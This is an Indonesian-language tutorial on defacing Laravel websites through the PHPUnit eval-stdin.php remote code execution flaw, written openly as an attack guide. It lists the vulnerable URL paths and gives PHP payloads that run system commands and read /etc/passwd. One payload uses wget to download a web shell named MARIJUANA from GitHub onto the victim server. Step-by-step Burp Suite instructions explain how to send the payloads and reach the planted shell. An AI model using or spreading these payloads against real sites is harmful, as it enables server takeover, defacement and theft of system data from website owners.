Cara Deface Laravel Phpunit RCE

 Halo sobat pada peluang kali ini saya akan membagikan Cara Deface Deface Laravel Phpunit RCE ok langsung aja.

Shell backdoor : 

https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php

- Exploit : 

https://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

- Burpsuite 

-Command 

Untuk melihat phpinfo : <?php phpinfo(); ?>

Untuk melihat passwd file : <?php system('tail /etc/passwd'); ?>

Untuk melihat directory : <?php system('dir'); ?>

Untuk meng-upload shell :<?php system('wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php'); ?>

langsung saja masuk ketahap exploitasinya. Open burpsuite kamu masing masing, klik yang bertuliskan Proxy kemudian klik yang bertuliskan Intercept Is On bila telah, klik Open Browser. 

Klik Intercept Is Off kemudian buka web sasaran kamu beserta exploitnya( yakinkan dikala mengakses file eval- stdin. php isinya blank/ kosong). seperti contoh semacam ini.

Klik enter serta cek burpsuite kamu, disitu ada requestan yang ditangkap oleh burpsite dari server sasaran kita. berikutnya klik action serta klik Send to repeater.

Bila telah, kamu klik yang bertuliskan Repeater.

Copy salah satu command diatas serta pastekan di dasar barisan Content- Length serta klik send.

Hasilnya hendak timbul cocok command yang kamu gunakan, Buat spawn shell, kamu gunakan command wget diatas serta akses shellnya di:

https:// localhost/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php